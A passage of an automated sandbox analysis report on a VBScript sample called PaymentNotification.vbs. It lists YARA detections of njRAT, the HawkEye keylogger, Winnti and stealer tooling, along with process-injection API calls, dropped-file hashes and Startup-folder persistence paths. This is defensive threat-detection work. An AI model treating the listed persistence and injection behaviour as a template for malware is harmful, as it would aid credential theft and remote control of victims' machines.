Source: 13.0.tmpFB21.tmp.exe.8ffa72.3.raw.unpack, type: UNPACKEDPE Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 2.2.pgr.exe.3a3fd88.3.unpack, type: UNPACKEDPE Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 2.2.pgr.exe.3a3fd88.3.unpack, type: UNPACKEDPE Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 13.0.tmpFB21.tmp.exe.8a8208.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 13.0.tmpFB21.tmp.exe.8a8208.2.raw.unpack, type: UNPACKEDPE Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 2.2.pgr.exe.3a47b95.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 2.2.pgr.exe.3a47b95.1.raw.unpack, type: UNPACKEDPE Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 13.2.tmpFB21.tmp.exe.3048e00.4.raw.unpack, type: UNPACKEDPE Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Contains functionality to call native functions
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Code function: 13_2_02CC5672 NtResumeThread, 13_2_02CC5672
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Code function: 13_2_02CC55CA NtQuerySystemInformation, 13_2_02CC55CA
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Code function: 13_2_02CC571A NtWriteVirtualMemory, 13_2_02CC571A
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Code function: 13_2_02CC56ED NtWriteVirtualMemory, 13_2_02CC56ED
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Code function: 13_2_02CC5590 NtQuerySystemInformation, 13_2_02CC5590
Detected potential crypto function
Source: C:\Users\user\AppData\Local\Temp\Tmp.exe Code function: 1_2_00007FFD067D0ADD 1_2_00007FFD067D0ADD
Source: C:\Users\user\AppData\Local\Temp\Tmp.exe Code function: 1_2_00007FFD067D36BD 1_2_00007FFD067D36BD
Source: C:\Users\user\AppData\Local\Temp\Tmp.exe Code function: 1_2_00007FFD067D1E55 1_2_00007FFD067D1E55
Source: C:\Users\user\AppData\Local\Temp\pgr.exe Code function: 2_2_00A82238 2_2_00A82238
Source: C:\Users\user\AppData\Roaming\servieda.exe Code function: 3_2_00007FFD067E0ADD 3_2_00007FFD067E0ADD
Source: C:\Users\user\AppData\Roaming\servieda.exe Code function: 3_2_00007FFD067E60AA 3_2_00007FFD067E60AA
Source: C:\Users\user\AppData\Roaming\servieda.exe Code function: 3_2_00007FFD067E36BD 3_2_00007FFD067E36BD
Source: C:\Users\user\AppData\Roaming\servieda.exe Code function: 3_2_00007FFD067E620C 3_2_00007FFD067E620C
Source: C:\Users\user\AppData\Roaming\servieda.exe Code function: 3_2_00007FFD067E650D 3_2_00007FFD067E650D
Source: C:\Users\user\AppData\Roaming\servieda.exe Code function: 3_2_00007FFD067E792A 3_2_00007FFD067E792A
Source: C:\Users\user\AppData\Roaming\servieda.exe Code function: 3_2_00007FFD067E61D3 3_2_00007FFD067E61D3
Source: C:\Users\user\AppData\Roaming\servieda.exe Code function: 3_2_00007FFD067E1E55 3_2_00007FFD067E1E55
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exe Code function: 8_2_00007FFD06800ADD 8_2_00007FFD06800ADD
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exe Code function: 8_2_00007FFD06803985 8_2_00007FFD06803985
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exe Code function: 8_2_00007FFD06801E55 8_2_00007FFD06801E55
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe Code function: 12_2_006E5DCA 12_2_006E5DCA
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe Code function: 12_2_00F4D5E0 12_2_00F4D5E0
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe Code function: 12_2_00F49530 12_2_00F49530
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe Code function: 12_2_00F48C60 12_2_00F48C60
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe Code function: 12_2_00F4F298 12_2_00F4F298
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe Code function: 12_2_00F48918 12_2_00F48918
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Code function: 13_2_008AD426 13_2_008AD426
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Code function: 13_2_008BD5AE 13_2_008BD5AE
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Code function: 13_2_008AD523 13_2_008AD523
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Code function: 13_2_008B7646 13_2_008B7646
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Code function: 13_2_008E29BE 13_2_008E29BE
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Code function: 13_2_008E6AF4 13_2_008E6AF4
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Code function: 13_2_0090ABFC 13_2_0090ABFC
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Code function: 13_2_00903CBE 13_2_00903CBE
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Code function: 13_2_00903C4D 13_2_00903C4D
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Code function: 13_2_00903DC0 13_2_00903DC0
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Code function: 13_2_008AED03 13_2_008AED03
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Code function: 13_2_00903D2F 13_2_00903D2F
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Code function: 13_2_008ACF92 13_2_008ACF92
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Code function: 13_2_008BAFA6 13_2_008BAFA6
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Code function: 13_2_0102639C 13_2_0102639C
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Code function: 13_2_02C96048 13_2_02C96048
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Code function: 13_2_02C95758 13_2_02C95758
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Code function: 13_2_02C97C30 13_2_02C97C30
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Code function: 13_2_02C97089 13_2_02C97089
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Code function: 13_2_02C97098 13_2_02C97098
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Code function: 13_2_02C91D9A 13_2_02C91D9A
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Code function: 13_2_02C91DA8 13_2_02C91DA8
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Code function: 13_2_008DC7BC 13_2_008DC7BC
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 14_2_00404DDB 14_2_00404DDB
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 14_2_0040BD8A 14_2_0040BD8A
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 14_2_00404E4C 14_2_00404E4C
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 14_2_00404EBD 14_2_00404EBD
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 14_2_00404F4E 14_2_00404F4E
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\Tmp.exe 2E5075A95C5663256555E292409149B4522F76FBE63BB48665213006C2D5CA2A
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\pgr.exe BFD5D84C4FED8F9D23F94FE32BB7EE415DBE632C2EBAAC642DBFDB73F89D0833
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\79c06ef4ef423d882819c4e66285ec85.exe BFD5D84C4FED8F9D23F94FE32BB7EE415DBE632C2EBAAC642DBFDB73F89D0833
Found potential string decryption / allocating functions
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: String function: 00411538 appears 35 times
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Code function: String function: 008EBA9D appears 35 times
Java / VBScript file with very long strings (likely obfuscated code)
Source: PaymentNotification.vbs Initial sample: Strings found which are bigger than 50
Yara signature match
Source: 00000000.00000003.361826559.000001B866181000.00000004.00000001.sdmp, type: MEMORY Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000003.00000003.375381174.00000000006AD000.00000004.00000001.sdmp, type: MEMORY Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000003.00000003.434132652.00000000006AD000.00000004.00000001.sdmp, type: MEMORY Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000003.00000003.386399141.00000000006AD000.00000004.00000001.sdmp, type: MEMORY Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000003.00000003.418513533.00000000006AD000.00000004.00000001.sdmp, type: MEMORY Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000003.00000000.364575966.00000000000A2000.00000002.00020000.sdmp, type: MEMORY Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000003.00000002.599389764.00000000000A2000.00000002.00020000.sdmp, type: MEMORY Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000003.00000003.431917812.00000000006AD000.00000004.00000001.sdmp, type: MEMORY Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000001.00000000.355914114.00000000001D2000.00000002.00020000.sdmp, type: MEMORY Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000003.00000003.404397604.00000000006AD000.00000004.00000001.sdmp, type: MEMORY Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000002.00000002.599254975.0000000000082000.00000002.00020000.sdmp, type: MEMORY Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000002.00000002.599254975.0000000000082000.00000002.00020000.sdmp, type: MEMORY Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 00000001.00000003.360210292.0000000000696000.00000004.00000001.sdmp, type: MEMORY Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000000.00000003.361022264.000001B86606A000.00000004.00000001.sdmp, type: MEMORY Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000003.00000003.416270861.00000000006AD000.00000004.00000001.sdmp, type: MEMORY Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000003.00000003.407415597.00000000006AD000.00000004.00000001.sdmp, type: MEMORY Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000003.00000003.379800367.00000000006AD000.00000004.00000001.sdmp, type: MEMORY Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000000.00000003.361732058.000001B8660A7000.00000004.00000001.sdmp, type: MEMORY Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000003.00000003.409647935.00000000006AD000.00000004.00000001.sdmp, type: MEMORY Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000002.00000002.608644673.00000000028C1000.00000004.00000001.sdmp, type: MEMORY Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 00000002.00000002.608644673.00000000028C1000.00000004.00000001.sdmp, type: MEMORY Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000003.342778002.000001B866BB3000.00000004.00000001.sdmp, type: MEMORY Matched rule: SUSP_Double_Base64_Encoded_Executable date = 2019-10-29, hash1 = 1a172d92638e6fdb2858dcca7a78d4b03c424b7f14be75c2fd479f59049bc5f9, author = Florian Roth, description = Detects an executable that has been encoded with base64 twice, reference = https://twitter.com/TweeterCyber/status/1189073238803877889
Source: 00000003.00000003.429703452.00000000006AD000.00000004.00000001.sdmp, type: MEMORY Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000000.00000003.363543444.000001B865F71000.00000004.00000001.sdmp, type: MEMORY Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000000.00000003.363543444.000001B865F71000.00000004.00000001.sdmp, type: MEMORY Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 00000003.00000003.384190622.00000000006AD000.00000004.00000001.sdmp, type: MEMORY Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000003.00000003.420692346.00000000006AD000.00000004.00000001.sdmp, type: MEMORY Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000003.00000002.600750205.00000000006AA000.00000004.00000020.sdmp, type: MEMORY Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000008.00000000.392012717.0000000000A72000.00000002.00020000.sdmp, type: MEMORY Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000003.00000003.422988044.00000000006AD000.00000004.00000001.sdmp, type: MEMORY Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000003.00000003.397417022.00000000006AD000.00000004.00000001.sdmp, type: MEMORY Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 0000000D.00000002.599349965.00000000008A2000.00000002.00020000.sdmp, type: MEMORY Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 0000000D.00000002.599349965.00000000008A2000.00000002.00020000.sdmp, type: MEMORY Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.365445146.00000000001D2000.00000002.00020000.sdmp, type: MEMORY Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000003.00000003.388634565.00000000006AD000.00000004.00000001.sdmp, type: MEMORY Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000000.00000002.374043001.000001B866BB2000.00000004.00000001.sdmp, type: MEMORY Matched rule: SUSP_Double_Base64_Encoded_Executable date = 2019-10-29, hash1 = 1a172d92638e6fdb2858dcca7a78d4b03c424b7f14be75c2fd479f59049bc5f9, author = Florian Roth, description = Detects an executable that has been encoded with base64 twice, reference = https://twitter.com/TweeterCyber/status/1189073238803877889
Source: 00000003.00000003.381975904.00000000006AD000.00000004.00000001.sdmp, type: MEMORY Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 0000000D.00000002.609034784.0000000003021000.00000004.00000001.sdmp, type: MEMORY Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000003.390816638.00000000006AD000.00000004.00000001.sdmp, type: MEMORY Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000003.00000003.414035813.00000000006AD000.00000004.00000001.sdmp, type: MEMORY Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000002.00000002.611403829.00000000039DF000.00000004.00000001.sdmp, type: MEMORY Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 00000002.00000002.611403829.00000000039DF000.00000004.00000001.sdmp, type: MEMORY Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000003.399625080.00000000006AD000.00000004.00000001.sdmp, type: MEMORY Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000008.00000002.395800979.0000000000A72000.00000002.00020000.sdmp, type: MEMORY Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000000.00000003.363508087.000001B865F8D000.00000004.00000001.sdmp, type: MEMORY Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000000.00000003.363508087.000001B865F8D000.00000004.00000001.sdmp, type: MEMORY Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 00000003.00000003.425183434.00000000006AD000.00000004.00000001.sdmp, type: MEMORY Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 0000000D.00000000.490757263.00000000008A2000.00000002.00020000.sdmp, type: MEMORY Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 0000000D.00000000.490757263.00000000008A2000.00000002.00020000.sdmp, type: MEMORY Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000003.377587214.00000000006AD000.00000004.00000001.sdmp, type: MEMORY Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000003.00000003.411854151.00000000006AD000.00000004.00000001.sdmp, type: MEMORY Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000003.00000003.519777905.00000000006B0000.00000004.00000001.sdmp, type: MEMORY Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000000.00000003.341582297.000001B865D3F000.00000004.00000001.sdmp, type: MEMORY Matched rule: SUSP_Double_Base64_Encoded_Executable date = 2019-10-29, hash1 = 1a172d92638e6fdb2858dcca7a78d4b03c424b7f14be75c2fd479f59049bc5f9, author = Florian Roth, description = Detects an executable that has been encoded with base64 twice, reference = https://twitter.com/TweeterCyber/status/1189073238803877889
Source: 00000003.00000003.427394879.00000000006AD000.00000004.00000001.sdmp, type: MEMORY Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000003.00000003.401942814.00000000006AD000.00000004.00000001.sdmp, type: MEMORY Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 0000000D.00000002.616200946.0000000008100000.00000004.00000001.sdmp, type: MEMORY Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000003.00000003.436364231.00000000006AD000.00000004.00000001.sdmp, type: MEMORY Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 0000000D.00000002.616252308.0000000008150000.00000004.00000001.sdmp, type: MEMORY Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000000.00000003.369408079.000001B867140000.00000004.00000001.sdmp, type: MEMORY Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000000.00000003.369408079.000001B867140000.00000004.00000001.sdmp, type: MEMORY Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 00000002.00000000.360863456.0000000000082000.00000002.00020000.sdmp, type: MEMORY Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000002.00000000.360863456.0000000000082000.00000002.00020000.sdmp, type: MEMORY Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: Process Memory Space: wscript.exe PID: 5972, type: MEMORY Matched rule: SUSP_Double_Base64_Encoded_Executable date = 2019-10-29, hash1 = 1a172d92638e6fdb2858dcca7a78d4b03c424b7f14be75c2fd479f59049bc5f9, author = Florian Roth, description = Detects an executable that has been encoded with base64 twice, reference = https://twitter.com/TweeterCyber/status/1189073238803877889
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\79c06ef4ef423d882819c4e66285ec85.exe, type: DROPPED Matched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\79c06ef4ef423d882819c4e66285ec85.exe, type: DROPPED Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\79c06ef4ef423d882819c4e66285ec85.exe, type: DROPPED Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: C:\Users\user\AppData\Roaming\servieda.exe, type: DROPPED Matched rule: MAL_Winnti_Sample_May18_1 date = 2018-05-04, hash1 = 528d9eaaac67716e6b37dd562770190318c8766fa1b2f33c0974f7d5f6725d41, author = Florian Roth, description = Detects malware sample from Burning Umbrella report - Generic Winnti Rule, reference = https://401trg.pw/burning-umbrella/, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\Users\user\AppData\Roaming\servieda.exe, type: DROPPED Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: C:\Users\user\AppData\Local\Temp\Tmp.exe, type: DROPPED Matched rule: MAL_Winnti_Sample_May18_1 date = 2018-05-04, hash1 = 528d9eaaac67716e6b37dd562770190318c8766fa1b2f33c0974f7d5f6725d41, author = Florian Roth, description = Detects malware sample from Burning Umbrella report - Generic Winnti Rule, reference = https://401trg.pw/burning-umbrella/, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\Users\user\AppData\Local\Temp\Tmp.exe, type: DROPPED Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: C:\Users\user\AppData\Local\Temp\pgr.exe, type: DROPPED Matched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\Users\user\AppData\Local\Temp\pgr.exe, type: DROPPED Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: C:\Users\user\AppData\Local\Temp\pgr.exe, type: DROPPED Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe, type: DROPPED Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe, type: DROPPED Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe, type: DROPPED Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exe, type: DROPPED Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 0.3.wscript.exe.1b86717d130.5.unpack, type: UNPACKEDPE Matched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.3.wscript.exe.1b86717d130.5.unpack, type: UNPACKEDPE Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 0.3.wscript.exe.1b86717d130.5.unpack, type: UNPACKEDPE Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
